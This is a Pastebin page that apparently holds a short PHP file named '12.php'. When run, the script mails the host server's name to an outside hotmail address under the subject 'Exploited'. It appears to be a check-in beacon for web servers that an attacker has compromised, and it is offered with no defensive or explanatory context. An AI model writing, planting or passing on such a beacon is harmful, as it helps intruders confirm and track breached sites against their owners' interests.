Advertisement
PalmaSolutions

12.php

May 27th, 2018
280
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.24 KB | None | 0 0
  1. <?php $to = "misterxgoofy@hotmail.com";
  2. $subject = "Exploited";
  3. $body = $_SERVER["SERVER_NAME"];
  4. if (mail($to, $subject, $body)) {
  5.   echo("<p>Message successfully sent!</p>");
  6.  } else {
  7.   echo("<p>Message delivery failed...</p>");
  8.  }; ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement